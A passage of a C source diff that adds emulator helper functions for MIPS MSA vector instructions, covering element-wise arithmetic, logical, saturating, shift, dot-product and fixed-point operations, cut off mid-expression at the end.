wx, *pwx = &wx; + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwx->b[i] = pws->b[SHF_POS(i, imm)]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwx->h[i] = pws->h[SHF_POS(i, imm)]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwx->w[i] = pws->w[SHF_POS(i, imm)]; + } + break; + default: + assert(0); + } + msa_move_v(pwd, pwx); +} + +#define MSA_FN_VECTOR(FUNC, DEST, OPERATION) \ +void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ + uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + DEST = OPERATION; \ + } \ +} + +MSA_FN_VECTOR(and_v, pwd->d[i], pws->d[i] & pwt->d[i]) +MSA_FN_VECTOR(or_v, pwd->d[i], pws->d[i] | pwt->d[i]) +MSA_FN_VECTOR(nor_v, pwd->d[i], ~(pws->d[i] | pwt->d[i])) +MSA_FN_VECTOR(xor_v, pwd->d[i], pws->d[i] ^ pwt->d[i]) +MSA_FN_VECTOR(bmnz_v, pwd->d[i], + BIT_MOVE_IF_NOT_ZERO(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +MSA_FN_VECTOR(bmz_v, pwd->d[i], + BIT_MOVE_IF_ZERO(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +MSA_FN_VECTOR(bsel_v, pwd->d[i], + BIT_SELECT(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +#undef BIT_MOVE_IF_NOT_ZERO +#undef BIT_MOVE_IF_ZERO +#undef BIT_SELECT +#undef MSA_FN_VECTOR + +static inline int64_t msa_addv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 + arg2; +} + +static inline int64_t msa_subv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 - arg2; +} + +static inline int64_t msa_ceq_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 == arg2 ? -1 : 0; +} + +static inline int64_t msa_cle_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 <= arg2 ? -1 : 0; +} + +static inline int64_t msa_cle_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 <= u_arg2 ? -1 : 0; +} + +static inline int64_t msa_clt_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 < arg2 ? -1 : 0; +} + +static inline int64_t msa_clt_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 < u_arg2 ? -1 : 0; +} + +static inline int64_t msa_max_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 > arg2 ? arg1 : arg2; +} + +static inline int64_t msa_max_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 > u_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 < arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 < u_arg2 ? arg1 : arg2; +} + +#define MSA_BINOP_IMM_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws, int32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_IMM_DF(addvi, addv) +MSA_BINOP_IMM_DF(subvi, subv) +MSA_BINOP_IMM_DF(ceqi, ceq) +MSA_BINOP_IMM_DF(clei_s, cle_s) +MSA_BINOP_IMM_DF(clei_u, cle_u) +MSA_BINOP_IMM_DF(clti_s, clt_s) +MSA_BINOP_IMM_DF(clti_u, clt_u) +MSA_BINOP_IMM_DF(maxi_s, max_s) +MSA_BINOP_IMM_DF(maxi_u, max_u) +MSA_BINOP_IMM_DF(mini_s, min_s) +MSA_BINOP_IMM_DF(mini_u, min_u) +#undef MSA_BINOP_IMM_DF + +void helper_msa_ldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = (int8_t)s10; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = (int16_t)s10; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = (int32_t)s10; + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = (int64_t)s10; + } + break; + default: + assert(0); + } +} + +/* Data format bit position and unsigned values */ +#define BIT_POSITION(x, df) ((uint64_t)(x) % DF_BITS(df)) + +static inline int64_t msa_sll_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return arg1 << b_arg2; +} + +static inline int64_t msa_sra_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return arg1 >> b_arg2; +} + +static inline int64_t msa_srl_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + int32_t b_arg2 = BIT_POSITION(arg2, df); + return u_arg1 >> b_arg2; +} + +static inline int64_t msa_bclr_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 & (~(1LL << b_arg2)), df); +} + +static inline int64_t msa_bset_df(uint32_t df, int64_t arg1, + int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 | (1LL << b_arg2), df); +} + +static inline int64_t msa_bneg_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + return UNSIGNED(arg1 ^ (1LL << b_arg2), df); +} + +static inline int64_t msa_binsl_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_dest = UNSIGNED(dest, df); + int32_t sh_d = BIT_POSITION(arg2, df) + 1; + int32_t sh_a = DF_BITS(df) - sh_d; + if (sh_d == DF_BITS(df)) { + return u_arg1; + } else { + return UNSIGNED(UNSIGNED(u_dest << sh_d, df) >> sh_d, df) | + UNSIGNED(UNSIGNED(u_arg1 >> sh_a, df) << sh_a, df); + } +} + +static inline int64_t msa_binsr_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_dest = UNSIGNED(dest, df); + int32_t sh_d = BIT_POSITION(arg2, df) + 1; + int32_t sh_a = DF_BITS(df) - sh_d; + if (sh_d == DF_BITS(df)) { + return u_arg1; + } else { + return UNSIGNED(UNSIGNED(u_dest >> sh_d, df) << sh_d, df) | + UNSIGNED(UNSIGNED(u_arg1 << sh_a, df) >> sh_a, df); + } +} + +static inline int64_t msa_sat_s_df(uint32_t df, int64_t arg, uint32_t m) +{ + return arg < M_MIN_INT(m+1) ? M_MIN_INT(m+1) : + arg > M_MAX_INT(m+1) ? M_MAX_INT(m+1) : + arg; +} + +static inline int64_t msa_sat_u_df(uint32_t df, int64_t arg, uint32_t m) +{ + uint64_t u_arg = UNSIGNED(arg, df); + return u_arg < M_MAX_UINT(m+1) ? u_arg : + M_MAX_UINT(m+1); +} + +static inline int64_t msa_srar_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int32_t b_arg2 = BIT_POSITION(arg2, df); + if (b_arg2 == 0) { + return arg1; + } else { + int64_t r_bit = (arg1 >> (b_arg2 - 1)) & 1; + return (arg1 >> b_arg2) + r_bit; + } +} + +static inline int64_t msa_srlr_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + int32_t b_arg2 = BIT_POSITION(arg2, df); + if (b_arg2 == 0) { + return u_arg1; + } else { + uint64_t r_bit = (u_arg1 >> (b_arg2 - 1)) & 1; + return (u_arg1 >> b_arg2) + r_bit; + } +} + +#define MSA_BINOP_IMMU_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ + uint32_t ws, uint32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_IMMU_DF(slli, sll) +MSA_BINOP_IMMU_DF(srai, sra) +MSA_BINOP_IMMU_DF(srli, srl) +MSA_BINOP_IMMU_DF(bclri, bclr) +MSA_BINOP_IMMU_DF(bseti, bset) +MSA_BINOP_IMMU_DF(bnegi, bneg) +MSA_BINOP_IMMU_DF(sat_s, sat_s) +MSA_BINOP_IMMU_DF(sat_u, sat_u) +MSA_BINOP_IMMU_DF(srari, srar) +MSA_BINOP_IMMU_DF(srlri, srlr) +#undef MSA_BINOP_IMMU_DF + +#define MSA_TEROP_IMMU_DF(helper, func) \ +void helper_msa_ ## helper ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws, uint32_t u5) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pwd->b[i], pws->b[i], \ + u5); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pwd->h[i], pws->h[i], \ + u5); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pwd->w[i], pws->w[i], \ + u5); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pwd->d[i], pws->d[i], \ + u5); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_TEROP_IMMU_DF(binsli, binsl) +MSA_TEROP_IMMU_DF(binsri, binsr) +#undef MSA_TEROP_IMMU_DF + +static inline int64_t msa_max_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 > abs_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 < abs_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_add_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + return abs_arg1 + abs_arg2; +} + +static inline int64_t msa_adds_a_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t max_int = (uint64_t)DF_MAX_INT(df); + uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; + uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; + if (abs_arg1 > max_int || abs_arg2 > max_int) { + return (int64_t)max_int; + } else { + return (abs_arg1 < max_int - abs_arg2) ? abs_arg1 + abs_arg2 : max_int; + } +} + +static inline int64_t msa_adds_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (arg1 < 0) { + return (min_int - arg1 < arg2) ? arg1 + arg2 : min_int; + } else { + return (arg2 < max_int - arg1) ? arg1 + arg2 : max_int; + } +} + +static inline uint64_t msa_adds_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t max_uint = DF_MAX_UINT(df); + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return (u_arg1 < max_uint - u_arg2) ? u_arg1 + u_arg2 : max_uint; +} + +static inline int64_t msa_ave_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed shift */ + return (arg1 >> 1) + (arg2 >> 1) + (arg1 & arg2 & 1); +} + +static inline uint64_t msa_ave_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned shift */ + return (u_arg1 >> 1) + (u_arg2 >> 1) + (u_arg1 & u_arg2 & 1); +} + +static inline int64_t msa_aver_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed shift */ + return (arg1 >> 1) + (arg2 >> 1) + ((arg1 | arg2) & 1); +} + +static inline uint64_t msa_aver_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned shift */ + return (u_arg1 >> 1) + (u_arg2 >> 1) + ((u_arg1 | u_arg2) & 1); +} + +static inline int64_t msa_subs_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (arg2 > 0) { + return (min_int + arg2 < arg1) ? arg1 - arg2 : min_int; + } else { + return (arg1 < max_int + arg2) ? arg1 - arg2 : max_int; + } +} + +static inline int64_t msa_subs_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return (u_arg1 > u_arg2) ? u_arg1 - u_arg2 : 0; +} + +static inline int64_t msa_subsus_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t max_uint = DF_MAX_UINT(df); + if (arg2 >= 0) { + uint64_t u_arg2 = (uint64_t)arg2; + return (u_arg1 > u_arg2) ? + (int64_t)(u_arg1 - u_arg2) : + 0; + } else { + uint64_t u_arg2 = (uint64_t)(-arg2); + return (u_arg1 < max_uint - u_arg2) ? + (int64_t)(u_arg1 + u_arg2) : + (int64_t)max_uint; + } +} + +static inline int64_t msa_subsuu_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + int64_t max_int = DF_MAX_INT(df); + int64_t min_int = DF_MIN_INT(df); + if (u_arg1 > u_arg2) { + return u_arg1 - u_arg2 < (uint64_t)max_int ? + (int64_t)(u_arg1 - u_arg2) : + max_int; + } else { + return u_arg2 - u_arg1 < (uint64_t)(-min_int) ? + (int64_t)(u_arg1 - u_arg2) : + min_int; + } +} + +static inline int64_t msa_asub_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + /* signed compare */ + return (arg1 < arg2) ? + (uint64_t)(arg2 - arg1) : (uint64_t)(arg1 - arg2); +} + +static inline uint64_t msa_asub_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + /* unsigned compare */ + return (u_arg1 < u_arg2) ? + (uint64_t)(u_arg2 - u_arg1) : (uint64_t)(u_arg1 - u_arg2); +} + +static inline int64_t msa_mulv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 * arg2; +} + +static inline int64_t msa_div_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + if (arg1 == DF_MIN_INT(df) && arg2 == -1) { + return DF_MIN_INT(df); + } + return arg2 ? arg1 / arg2 : 0; +} + +static inline int64_t msa_div_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg2 ? u_arg1 / u_arg2 : 0; +} + +static inline int64_t msa_mod_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + if (arg1 == DF_MIN_INT(df) && arg2 == -1) { + return 0; + } + return arg2 ? arg1 % arg2 : 0; +} + +static inline int64_t msa_mod_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg2 ? u_arg1 % u_arg2 : 0; +} + +#define SIGNED_EVEN(a, df) \ + ((((int64_t)(a)) << (64 - DF_BITS(df)/2)) >> (64 - DF_BITS(df)/2)) + +#define UNSIGNED_EVEN(a, df) \ + ((((uint64_t)(a)) << (64 - DF_BITS(df)/2)) >> (64 - DF_BITS(df)/2)) + +#define SIGNED_ODD(a, df) \ + ((((int64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df)/2)) + +#define UNSIGNED_ODD(a, df) \ + ((((uint64_t)(a)) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df)/2)) + +#define SIGNED_EXTRACT(e, o, a, df) \ + do { \ + e = SIGNED_EVEN(a, df); \ + o = SIGNED_ODD(a, df); \ + } while (0); + +#define UNSIGNED_EXTRACT(e, o, a, df) \ + do { \ + e = UNSIGNED_EVEN(a, df); \ + o = UNSIGNED_ODD(a, df); \ + } while (0); + +static inline int64_t msa_dotp_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dotp_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +#define CONCATENATE_AND_SLIDE(s, k) \ + do { \ + for (i = 0; i < s; i++) { \ + v[i] = pws->b[s * k + i]; \ + v[i + s] = pwd->b[s * k + i]; \ + } \ + for (i = 0; i < s; i++) { \ + pwd->b[s * k + i] = v[i + n]; \ + } \ + } while (0) + +static inline void msa_sld_df(uint32_t df, wr_t *pwd, + wr_t *pws, target_ulong rt) +{ + uint32_t n = rt % DF_ELEMENTS(df); + uint8_t v[64]; + uint32_t i, k; + + switch (df) { + case DF_BYTE: + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_BYTE), 0); + break; + case DF_HALF: + for (k = 0; k < 2; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_HALF), k); + } + break; + case DF_WORD: + for (k = 0; k < 4; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_WORD), k); + } + break; + case DF_DOUBLE: + for (k = 0; k < 8; k++) { + CONCATENATE_AND_SLIDE(DF_ELEMENTS(DF_DOUBLE), k); + } + break; + default: + assert(0); + } +} + +static inline int64_t msa_hadd_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return SIGNED_ODD(arg1, df) + SIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hadd_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return UNSIGNED_ODD(arg1, df) + UNSIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hsub_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return SIGNED_ODD(arg1, df) - SIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_hsub_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return UNSIGNED_ODD(arg1, df) - UNSIGNED_EVEN(arg2, df); +} + +static inline int64_t msa_mul_q_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t q_min = DF_MIN_INT(df); + int64_t q_max = DF_MAX_INT(df); + + if (arg1 == q_min && arg2 == q_min) { + return q_max; + } + return (arg1 * arg2) >> (DF_BITS(df) - 1); +} + +static inline int64_t msa_mulr_q_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + int64_t q_min = DF_MIN_INT(df); + int64_t q_max = DF_MAX_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + if (arg1 == q_min && arg2 == q_min) { + return q_max; + } + return (arg1 * arg2 + r_bit) >> (DF_BITS(df) - 1); +} + +#define MSA_BINOP_DF(func) \ +void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, \ + uint32_t wd, uint32_t ws, uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + \ + switch (df) { \ + case DF_BYTE: \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + pwd->b[i] = msa_ ## func ## _df(df, pws->b[i], pwt->b[i]); \ + } \ + break; \ + case DF_HALF: \ + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { \ + pwd->h[i] = msa_ ## func ## _df(df, pws->h[i], pwt->h[i]); \ + } \ + break; \ + case DF_WORD: \ + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { \ + pwd->w[i] = msa_ ## func ## _df(df, pws->w[i], pwt->w[i]); \ + } \ + break; \ + case DF_DOUBLE: \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + pwd->d[i] = msa_ ## func ## _df(df, pws->d[i], pwt->d[i]); \ + } \ + break; \ + default: \ + assert(0); \ + } \ +} + +MSA_BINOP_DF(sll) +MSA_BINOP_DF(sra) +MSA_BINOP_DF(srl) +MSA_BINOP_DF(bclr) +MSA_BINOP_DF(bset) +MSA_BINOP_DF(bneg) +MSA_BINOP_DF(addv) +MSA_BINOP_DF(subv) +MSA_BINOP_DF(max_s) +MSA_BINOP_DF(max_u) +MSA_BINOP_DF(min_s) +MSA_BINOP_DF(min_u) +MSA_BINOP_DF(max_a) +MSA_BINOP_DF(min_a) +MSA_BINOP_DF(ceq) +MSA_BINOP_DF(clt_s) +MSA_BINOP_DF(clt_u) +MSA_BINOP_DF(cle_s) +MSA_BINOP_DF(cle_u) +MSA_BINOP_DF(add_a) +MSA_BINOP_DF(adds_a) +MSA_BINOP_DF(adds_s) +MSA_BINOP_DF(adds_u) +MSA_BINOP_DF(ave_s) +MSA_BINOP_DF(ave_u) +MSA_BINOP_DF(aver_s) +MSA_BINOP_DF(aver_u) +MSA_BINOP_DF(subs_s) +MSA_BINOP_DF(subs_u) +MSA_BINOP_DF(subsus_u) +MSA_BINOP_DF(subsuu_s) +MSA_BINOP_DF(asub_s) +MSA_BINOP_DF(asub_u) +MSA_BINOP_DF(mulv) +MSA_BINOP_DF(div_s) +MSA_BINOP_DF(div_u) +MSA_BINOP_DF(mod_s) +MSA_BINOP_DF(mod_u) +MSA_BINOP_DF(dotp_s) +MSA_BINOP_DF(dotp_u) +MSA_BINOP_DF(srar) +MSA_BINOP_DF(srlr) +MSA_BINOP_DF(hadd_s) +MSA_BINOP_DF(hadd_u) +MSA_BINOP_DF(hsub_s) +MSA_BINOP_DF(hsub_u) + +MSA_BINOP_DF(mul_q) +MSA_BINOP_DF(mulr_q) +#undef MSA_BINOP_DF + +void helper_msa_sld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t rt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + + msa_sld_df(df, pwd, pws, env->active_tc.gpr[rt]); +} + +static inline int64_t msa_maddv_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + return dest + arg1 * arg2; +} + +static inline int64_t msa_msubv_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + return dest - arg1 * arg2; +} + +static inline int64_t msa_dpadd_s_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dpadd_u_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); +} + +static inline int64_t msa_dpsub_s_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); +} + +static inline int64_t msa_dpsub_u_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t even_arg1; + int64_t even_arg2; + int64_t odd_arg1; + int64_t odd_arg2; + UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); + UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); + return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); +} + +static inline int64_t msa_madd_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_msub_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod) >> (DF_BITS(df) - 1); + + return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; +} + +static inline int64_t msa_maddr_q_df(uint32_t df, int64_t dest, int64_t arg1, + int64_t arg2) +{ + int64_t q_prod, q_ret; + + int64_t q_max = DF_MAX_INT(df); + int64_t q_min = DF_MIN_INT(df); + int64_t r_bit = (int64_t)1 << (DF_BITS(df) - 2); + + q_prod = arg1 * arg2; + q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod + r_bit) >> 